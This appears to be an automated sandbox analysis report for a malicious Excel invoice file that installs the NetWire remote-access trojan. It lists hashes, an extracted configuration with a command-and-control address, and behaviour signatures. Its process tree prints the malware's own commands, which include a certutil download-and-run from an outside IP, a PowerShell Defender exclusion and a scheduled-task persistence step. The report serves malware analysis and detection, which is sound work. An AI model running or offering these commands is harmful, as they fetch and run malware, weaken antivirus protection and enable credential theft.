Overview

overview

10

Static

static

TAX INVOIC...3.xlsm

windows7-x64

10

TAX INVOIC...3.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    10-08-2022 17:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TAX INVOICE 00893.xlsm

  • Size

    42KB

  • MD5

    dfd371ebf737c86675d54224482f3bf3

  • SHA1

    e84195e5871bfef86c18563ebe7b6ad1077f81e5

  • SHA256

    e209b1e1be73d201c0cf316df426fa1e0c2b436acf2d8c269ac6694b936d839e

  • SHA512

    994ba3a222532826c82081eb92ecb6d5cd57faf162fbd5e84ec1679fa13def5813b48c0f0b40044adf92a72ea9c6778c66474690635a7d0597e0f7c43b4391f2

Score
10/10
netwirebotnetratstealer

Malware Config

Extracted

Family

netwire

C2

194.5.98.126:3378

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    Pass@2023

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 8 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\TAX INVOICE 00893.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe && Aqrmdtmrohibrqzfihirniu.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe
        3⤵
          PID:964
        • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
          Aqrmdtmrohibrqzfihirniu.exe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TmbJbrgFWL.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmbJbrgFWL" /XML "C:\Users\Admin\AppData\Local\Temp\tmp40.tmp"
            4⤵
            • Creates scheduled task(s)
            PID:1296
          • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
            "C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"
            4⤵
            • Executes dropped EXE
            PID:688
          • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
            "C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"
            4⤵
            • Executes dropped EXE
            PID:1564

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp40.tmp
      Filesize

      1KB

      MD5

      b3643a1880f375bf8e3e7f0492a02f65

      SHA1

      c2f1424b7979e602dd8abcb1efa04b1a9eb1fc13

      SHA256

      17f2091daaabed349ea7979d90091e0d2622d4f96e03921e82315dbcb6e7a4a1

      SHA512

      88c118ffc5744e64c0bfe3c2c03886e791a7baa1bd57e8671cefcab0e3656981cb2c111060af1bbef1c268e3f17b18cde4100a57aae8fbebc6b29945dcc43c6b

      Download Submit

    • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • \Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • \Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe
      Filesize

      642KB

      MD5

      f9322ac00bfcc0cfce12ed4fb88d0aa1

      SHA1

      61d94897a267d53d3f3e3399345c4ecc7918295d

      SHA256

      e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7

      SHA512

      202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1

      Download Submit

    • memory/564-74-0x0000000005D70000-0x0000000005DE8000-memory.dmp

      Filesize

      480KB

      Download

    • memory/564-69-0x0000000000D70000-0x0000000000E18000-memory.dmp

      Filesize

      672KB

      Download

    • memory/564-79-0x0000000004F40000-0x0000000004F78000-memory.dmp

      Filesize

      224KB

      Download

    • memory/564-73-0x0000000000640000-0x000000000064C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/564-71-0x0000000000690000-0x00000000006B4000-memory.dmp

      Filesize

      144KB

      Download

    • memory/564-67-0x0000000000000000-mapping.dmp

      Download

    • memory/904-72-0x0000000072A9D000-0x0000000072AA8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/904-58-0x00000000766A1000-0x00000000766A3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/904-59-0x000000000053A000-0x000000000053E000-memory.dmp

      Filesize

      16KB

      Download

    • memory/904-60-0x000000000053A000-0x000000000053E000-memory.dmp

      Filesize

      16KB

      Download

    • memory/904-57-0x0000000072A9D000-0x0000000072AA8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/904-100-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/904-54-0x000000002FB81000-0x000000002FB84000-memory.dmp

      Filesize

      12KB

      Download

    • memory/904-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/904-101-0x0000000072A9D000-0x0000000072AA8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/904-55-0x0000000071AB1000-0x0000000071AB3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/964-62-0x0000000000000000-mapping.dmp

      Download

    • memory/1296-76-0x0000000000000000-mapping.dmp

      Download

    • memory/1528-97-0x0000000066DC0000-0x000000006736B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1528-75-0x0000000000000000-mapping.dmp

      Download

    • memory/1528-99-0x0000000066DC0000-0x000000006736B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1564-91-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-88-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-90-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-82-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-81-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-92-0x000000000040242D-mapping.dmp

      Download

    • memory/1564-96-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-87-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-98-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-86-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1564-84-0x0000000000400000-0x0000000000433000-memory.dmp

      Filesize

      204KB

      Download

    • memory/1728-61-0x0000000000000000-mapping.dmp

      Download